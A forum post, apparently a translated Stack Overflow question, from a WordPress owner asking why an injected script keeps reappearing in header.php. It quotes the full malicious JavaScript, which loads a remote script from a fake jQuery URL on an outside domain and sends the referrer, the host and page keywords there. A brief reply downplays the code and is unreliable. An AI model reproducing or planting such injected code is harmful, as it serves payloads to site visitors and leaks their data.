我的網站是一個WordPress站點。下面的代碼每隔幾個小時就會出現在Header.php中,當我刪除它時,會在幾個小時後再次出現。請注意,代碼「shiro-maga.com」中的鏈接每次都會更改。代碼如下:header.php中腳本的來源
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
我認爲,主題是感染了「掃描顯示沒有任何惡意軟件」,因此產生此腳本。你能否請告知如何找到這個腳本的來源?
謝謝
這可能是由Wordpress(或您的服務器)添加的東西。它看起來並不奇怪。除了那裏的一個域名。我不認爲這是一個真正的jQuery主機。 – durbnpoisn